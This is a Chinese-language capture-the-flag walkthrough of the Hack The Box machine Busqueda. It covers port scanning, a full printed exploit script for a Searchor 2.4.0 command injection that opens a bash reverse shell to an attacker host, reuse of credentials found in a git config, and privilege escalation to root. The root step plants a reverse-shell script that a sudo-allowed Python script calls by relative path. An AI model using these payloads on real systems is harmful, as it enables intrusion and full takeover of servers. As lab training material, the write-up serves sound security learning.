[HTB] Busqueda

First Post:

Last Update:

Word Count:
3k

Read Time:
16 min

3

前言

下次还填非常简单!

信息收集

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
$ sudo nmap -p- --min-rate=10000 10.10.11.208
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 22:34 EDT
Nmap scan report for 10.10.11.208
Host is up (0.075s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 10.09 seconds

$ sudo nmap -sT -sV -sC -O -p22,80 10.10.11.208
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 22:35 EDT
Nmap scan report for 10.10.11.208
Host is up (0.074s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

$ sudo nmap --script=vuln 10.10.11.208
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 22:45 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for searcher.htb (10.10.11.208)
Host is up (0.075s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=searcher.htb
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://searcher.htb:80/
|     Form id: engine-select
|_    Form action: /search
|_http-dombased-xss: Couldn't find any DOM based XSS.

Nmap done: 1 IP address (1 host up) scanned in 58.20 seconds

开了22和80,并且IP会重定向到http://searcher.htb ,那我们就把它加进host。

whatweb

1
2
$ sudo whatweb http://searcher.htb/
http://searcher.htb/ [200 OK] Bootstrap[4.1.3], Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/2.1.2 Python/3.10.6], IP[10.10.11.208], JQuery[3.2.1], Python[3.10.6], Script, Title[Searcher], Werkzeug[2.1.2]

我们可以发现其使用了Werkzeug[2.1.2]。Werkzeug是一个WSGI工具包,可以作为一个Web框架的底层库。我们searchspolit一下发现其存在Werkzeug - ‘Debug Shell’ Command Execution,可惜执行一下exp会发现debug模式并没有开利用不上。

nikto

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ sudo nikto -h http://searcher.htb/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.11.208
+ Target Hostname:    searcher.htb
+ Target Port:        80
+ Start Time:         2023-07-18 22:41:05 (GMT-4)
---------------------------------------------------------------------------
+ Server: Werkzeug/2.1.2 Python/3.10.6
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ : Server banner changed from 'Werkzeug/2.1.2 Python/3.10.6' to 'Apache/2.4.52 (Ubuntu)'.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS .
+ 7962 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2023-07-18 22:52:12 (GMT-4) (667 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

没啥信息。

web渗透

服务识别

71bc8aeab65fc3deae9530b9517ae7e7

访问一下网站,看网站介绍说是用于选择社交媒体搜索引擎提高搜索效率啥的。但是管他呢,我们最想看的是网页最下面的那一行:Searchor 2.4.0。直接上谷歌搜索有无漏洞可以利用。

Searchor

我们一搜就发现github上有相关PoC。Searchor 2.4.0存在任意命令注入的漏洞。那我们就按PoC介绍利用一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#PoC
#!/bin/bash -

default_port="9001"
port="${3:-$default_port}"
rev_shell_b64=$(echo -ne "bash  -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64)
evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment"
plus="+"

echo "---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---"

if [ -z "${evil_cmd##*$plus*}" ]
then
    evil_cmd=$(echo ${evil_cmd} | sed -r 's/[+]+/%2B/g')
fi

if [ $# -ne 0 ]
then
    echo "[*] Input target is $1"
    echo "[*] Input attacker is $2:${port}"
    echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection"
    curl -s -X POST $1/search -d "engine=Google&query=${evil_cmd}" 1> /dev/null
else 
    echo "[!] Please specify a IP address of target and IP address/Port of attacker for Reverse Shell, for example: 

./exploit.sh <TARGET> <ATTACKER> <PORT> [9001 by default]"
fi
1
2
3
4
5
$ ./searchor.sh http://searcher.htb/ <HTB_VPN_IP> <LOCAL_PORT>
---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---
[*] Input target is http://searcher.htb/
[*] Input attacker is <HTB_VPN_IP>:<LOCAL_PORT>
[*] Run the Reverse Shell... Press Ctrl+C after successful connection

本地nc监听一下:

1
2
3
4
5
6
$ sudo nc -lnvp 443
listening on [any] 443 ...
connect to [<HTB_VPN_IP>] from (UNKNOWN) [10.10.11.208] 35470
bash: cannot set terminal process group (1659): Inappropriate ioctl for device
bash: no job control in this shell
svc@busqueda:/var/www/app$

成功拿到立足点。在svc的home目录下可以发现user flag。

提权

虽然拿到shell第一时间是去home目录下看了下flag,但是我们刚进来的/var/www/app目录还没有好好看一眼。

1
2
3
4
5
6
7
8
svc@busqueda:/var/www/app$ ls -la
ls -la
total 20
drwxr-xr-x 4 www-data www-data 4096 Apr  3 14:32 .
drwxr-xr-x 4 root     root     4096 Apr  4 16:02 ..
-rw-r--r-- 1 www-data www-data 1124 Dec  1  2022 app.py
drwxr-xr-x 8 www-data www-data 4096 Jul 19 03:03 .git
drwxr-xr-x 2 www-data www-data 4096 Dec  1  2022 templates

我们发现有.git文件夹,那我们得进去看看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
svc@busqueda:/var/www/app/.git$ ls -la
ls -la
total 52
drwxr-xr-x 8 www-data www-data 4096 Jul 19 03:03 .
drwxr-xr-x 4 www-data www-data 4096 Apr  3 14:32 ..
drwxr-xr-x 2 www-data www-data 4096 Dec  1  2022 branches
-rw-r--r-- 1 www-data www-data   15 Dec  1  2022 COMMIT_EDITMSG
-rw-r--r-- 1 www-data www-data  294 Dec  1  2022 config
-rw-r--r-- 1 www-data www-data   73 Dec  1  2022 description
-rw-r--r-- 1 www-data www-data   21 Dec  1  2022 HEAD
drwxr-xr-x 2 www-data www-data 4096 Dec  1  2022 hooks
-rw-r--r-- 1 root     root      259 Apr  3 15:09 index
drwxr-xr-x 2 www-data www-data 4096 Dec  1  2022 info
drwxr-xr-x 3 www-data www-data 4096 Dec  1  2022 logs
drwxr-xr-x 9 www-data www-data 4096 Dec  1  2022 objects
drwxr-xr-x 5 www-data www-data 4096 Dec  1  2022 refs

这么多文件最需要看啥呢,当然是配置文件了,配置文件往往是最重要的那部分文件。

直接进行一个查看。

1
2
3
4
5
6
7
8
9
10
11
12
13
svc@busqueda:/var/www/app/.git$ cat config
cat config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = http://cody:******************@gitea.searcher.htb/cody/Searcher_site.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main

我们可以看到名为cody用户的github登录凭证。(不得不说他这密码看起还真像一串哈希值,我还想了一会会是什么哈希,结果之后试了一下是明文。。。。。。)

我们当然希望登录凭证复用问题的出现,直接用这个登录凭证登录一下看看。发现登录并不成功,我们如果看看/etc/passwd的话也能发现其实并没有cody这个用户,那有没有可能是svc的密码呢?我们尝试一下发现果然是。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
$ ssh svc@10.10.11.208
svc@10.10.11.208's password:
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-69-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jul 19 04:06:19 AM UTC 2023

  System load:                      0.0185546875
  Usage of /:                       80.9% of 8.26GB
  Memory usage:                     59%
  Swap usage:                       3%
  Processes:                        238
  Users logged in:                  0
  IPv4 address for br-c954bf22b8b2: 172.20.0.1
  IPv4 address for br-cbf2c5ce8e95: 172.19.0.1
  IPv4 address for br-fba5a3e31476: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.208


 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jul 19 03:04:01 2023 from 10.10.14.24
svc@busqueda:~$

那你可能想问这不是如蜜传如蜜吗,咋又回到svc这里了,提升了啥呢。当然不是原地tp,我们现在知道了svc 的密码,那就可以试试sudo -l了。如果没权限那确实原地tp了。

1
2
3
4
5
6
7
svc@busqueda:~$ sudo -l
[sudo] password for svc:
Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

我们发现svc可以执行/usr/bin/python3 /opt/scripts/system-checkup.py *这么一条命令,我们先执行一下看看这是谁的部将。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED        STATUS             PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   6 months ago   Up About an hour   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   6 months ago   Up About an hour   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong

我们大致试了一下action,暂时没啥好想法,先去它的路径下看一眼吧。

1
2
3
4
5
6
7
8
9
10
svc@busqueda:/opt/scripts$ ls -la
ls -la
total 28
drwxr-xr-x 3 root root 4096 Dec 24  2022 .
drwxr-xr-x 4 root root 4096 Mar  1 10:46 ..
-rwx--x--x 1 root root  586 Dec 24  2022 check-ports.py
-rwx--x--x 1 root root  857 Dec 24  2022 full-checkup.sh
drwxr-x--- 8 root root 4096 Apr  3 15:04 .git
-rwx--x--x 1 root root 3346 Dec 24  2022 install-flask.sh
-rwx--x--x 1 root root 1903 Dec 24  2022 system-checkup.py

在同一目录下我们还看到了full-checkup.sh,这和那个action的名字不是一样的吗,难道说system-checkup.py就是调用了它来实现action吗?那如果是的话我们不禁要问了,你这调用写的是相对路径还是绝对路径呢?我们当然希望其不是绝对路径,因为这样我们就能直接通过在PATH前面的位置插入我们伪造的full-checkup.sh提权脚本,或者是在某个目录下创建提权脚本并在该目录执行system-checkup.py

那么到底是不是呢?谁懂,试试就知道了。

1
2
svc@busqueda:~$ echo $PATH
/home/svc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

那我们直接在/home/svc/.local/bin下操作,不管你那种情况都能利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
svc@busqueda:~/.local/bin$ vim full-checkup.sh
svc@busqueda:~/.local/bin$ chmod +x full-checkup.sh
svc@busqueda:~/.local/bin$ ll
total 24
drwxrwxr-x 2 svc svc 4096 Jul 19 04:14 ./
drwxrwxr-x 5 svc svc 4096 Jun 15  2022 ../
-rwxrwxr-x 1 svc svc  208 Jun 15  2022 flask*
-rwxrwxr-x 1 svc svc   60 Jul 19 04:14 full-checkup.sh*
-rwxrwxr-x 1 svc svc  211 Jun 15  2022 pyjwt*
svc@busqueda:~/.local/bin$ cat full-checkup.sh
#!/bin/bash

/bin/bash -i >& /dev/tcp/<HTB_VPN_IP>/8080 0>&1
svc@busqueda:~/.local/bin$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

本地nc监听一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ sudo nc -nlvp 8080
listening on [any] 8080 ...
connect to [<HTB_VPN_IP>] from (UNKNOWN) [10.10.11.208] 53532
root@busqueda:/home/svc/.local/bin# cd /root
cd /root
root@busqueda:~# ls -la
ls -la
total 60
drwx------  9 root root 4096 Apr  3 16:01 .
drwxr-xr-x 19 root root 4096 Mar  1 10:46 ..
lrwxrwxrwx  1 root root    9 Feb 20 12:09 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc
drwx------  3 root root 4096 Mar  1 10:46 .cache
drwx------  3 root root 4096 Mar  1 10:46 .config
-rw-r-----  1 root root  430 Apr  3 15:13 ecosystem.config.js
-rw-r--r--  1 root root  104 Apr  3 08:58 .gitconfig
drwxr-xr-x  3 root root 4096 Mar  1 10:46 .local
-rw-------  1 root root   50 Feb 20 12:04 .my.cnf
lrwxrwxrwx  1 root root    9 Feb 20 12:12 .mysql_history -> /dev/null
drwxr-xr-x  4 root root 4096 Mar  1 10:46 .npm
drwxr-xr-x  5 root root 4096 Jul 19 03:03 .pm2
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r-----  1 root root   33 Jul 19 03:03 root.txt
drwxr-xr-x  4 root root 4096 Apr  3 16:01 scripts
drwx------  3 root root 4096 Mar  1 10:46 snap
root@busqueda:~# cat root.txt

拿下,符合我们的预期。